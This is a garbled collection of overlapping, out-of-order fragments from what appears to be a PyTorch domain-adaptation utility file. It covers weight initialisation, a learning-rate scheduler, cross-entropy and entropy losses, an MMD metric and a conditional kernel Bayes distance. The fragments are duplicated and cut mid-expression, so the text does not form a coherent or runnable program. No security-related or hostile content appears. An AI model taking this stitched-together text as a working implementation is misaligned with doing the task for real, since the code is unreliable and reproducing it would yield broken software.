epsilon*G_Zt.mm(Inv_t) #====== R_{st} =======", "2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1)", "= D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs =", "fea, matching conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s =", "= NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy Loss def Entropy(prob): num_sam = prob.shape[0]", "= torch.svd(Nuclear) #====== Conditional KB Distance CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5)", "H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\", "def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0 for batch_idx, (X, lab) in enumerate(data_loader):", "- torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s)", "- torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t)", "OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type ==", "parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') !=", "def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # Y: label, Z:", "-*- coding: utf-8 -*- import torch from 
torch.autograd import Variable import sys ##################################", "= prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\", "Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st}", "G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #======", "D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp()", "Variable ################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv') !=", "D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach()", "= prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #======", "a factor of 0.1 every lr_decay_epoch epochs.\"\"\" lr = init_lr * (1 +", "1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective Functions ################################## # Cross-Entropy", "= D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs =", "R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss def MMD_Metric(prob_s, prob_t):", "= num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2 # numerical symmetrize", "#====== Kernel Matrix and Centering Matrix ======= H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s", "return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0 for batch_idx, (X, lab)", "torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\", "lr_decay_epoch epochs.\"\"\" lr = init_lr * (1 + gamma * iter_num) ** (-power)", "U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n", "2 i += 1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective Functions", "D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\", "to variable.\"\"\" if torch.cuda.is_available(): x = x.cuda() return Variable(x) def to_data(x): \"\"\"Convert variable", "K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt", "iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by a factor of 0.1", "################################## # Network & Variable 
################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname =", "G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #======", "elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__ if", "param_group['weight_decay'] = weight_decay * 2 i += 1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler}", "\"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available(): x = x.cuda() return Variable(x) def to_data(x):", "= (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs =", "B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t - (G_Yt", "D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist = K_XsXs.mean()", "conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if", "= fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t())", "= D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist =", "!= -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def", "= prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt", "Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss #", "- 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0]", "elif CKB_type == 'soft': prob_t = prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s =", "D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\", "i += 1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective Functions ##################################", "or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0, 0.02)", "lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # Y: label, Z: fea, matching conditional", "num_sam_t = fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach()", "prob = FC(DNN(X)) plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item() /", "0 
for batch_idx, (X, lab) in enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze() _,", "R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s", "D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp()", "torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1:", "= prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t())", "def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1:", "+= 1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective Functions ################################## #", "G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s =", "+\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs =", "epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) #", "prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs", "sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist", "lr = init_lr * (1 + gamma * iter_num) ** (-power) i =", "def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by a", "elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to variable.\"\"\" if", "variable to numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with", "def to_var(x): \"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available(): x = x.cuda() return Variable(x)", "fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt", "symmetrize B_t = (B_t + B_t.t())/2 # numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True)", "D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\", "= prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset) return accuracy def", "prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ 
prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt =", "2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1)", "# MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs", "(-power) i = 0 for param_group in optimizer.param_groups: param_group['lr'] = lr * param_lr[i]", "torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\", "# -*- coding: utf-8 -*- import torch from torch.autograd import Variable import sys", "Kernel Matrix and Centering Matrix ======= H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda()", "CKB_type == 'soft': prob_t = prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda()", "param_group in optimizer.param_groups: param_group['lr'] = lr * param_lr[i] param_group['weight_decay'] = weight_decay * 2", "prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t)", "= OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t())", "= correct.item() / len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001,", "= epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s = I_s -", "== 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t = prob_t.detach() else:", "0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0,", "return Entropy/num_sam # CKB loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2,", "- (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2", "(-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist = K_XsXs.mean() + K_XtXt.mean() -", "_, prob = FC(DNN(X)) plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item()", "(-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t)", "H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n,", "################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv') != -1:", "CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # 
Y: label, Z: fea,", "plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset) return accuracy", "classname = m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1:", "I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering Matrix =======", "gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by a factor of 0.1 every", "plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma,", "R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s = I_s - (G_Ys -", "= D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt =", "num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2 # numerical symmetrize B_t", "= D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs =", "D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\", "rate by a factor of 0.1 every lr_decay_epoch epochs.\"\"\" lr = init_lr *", "* iter_num) ** (-power) i = 0 for param_group in optimizer.param_groups: param_group['lr'] =", "(epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t =", "CKB_dist # MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0]", "epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s = I_s - (G_Ys", "= weight_decay * 2 i += 1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ##################################", "* param_lr[i] param_group['weight_decay'] = weight_decay * 2 i += 1 return optimizer schedule_dict", "= 0 for batch_idx, (X, lab) in enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze()", "prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s)", "= prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t())", "fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs =", "* 2 i += 1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective", "I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon)", "= prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 
2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs", "weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight)", "m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1:", "m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02)", "lr * param_lr[i] param_group['weight_decay'] = weight_decay * 2 i += 1 return optimizer", "optimizer.param_groups: param_group['lr'] = lr * param_lr[i] param_group['weight_decay'] = weight_decay * 2 i +=", "init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by a factor of 0.1 every lr_decay_epoch epochs.\"\"\"", "torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs =", "prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== Kernel", "-1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear')", "num_sam = prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss def CKB_Metric(fea_s,", "(-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t)", "def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\", "= init_lr * (1 + gamma * iter_num) ** (-power) i = 0", "= H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n,", "enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab = prob.data.max(1)[1]", "# Entropy Loss def Entropy(prob): num_sam = prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam", "factor of 0.1 every lr_decay_epoch epochs.\"\"\" lr = init_lr * (1 + gamma", "= (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t", "torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy Loss def", "MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs =", "weight_decay=0.0005): \"\"\"Decay learning rate by a factor of 0.1 every lr_decay_epoch epochs.\"\"\" lr", "torch.cuda.is_available(): x = x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0", "(G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2 #", "= (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} =======", "( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs", "classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0 for 
batch_idx, (X, lab) in enumerate(data_loader): X,", "prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # Y: label, Z: fea, matching conditional distribution P(Z|Y)", "prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t = prob_t.detach() else: sys.exit('Error: invalid", "sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs", "variable.\"\"\" if torch.cuda.is_available(): x = x.cuda() return Variable(x) def to_data(x): \"\"\"Convert variable to", "+ G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t)", "num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t())", "S_n, V_n = torch.svd(Nuclear) #====== Conditional KB Distance CKB_dist = R_s.trace() + R_t.trace()", "(H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = 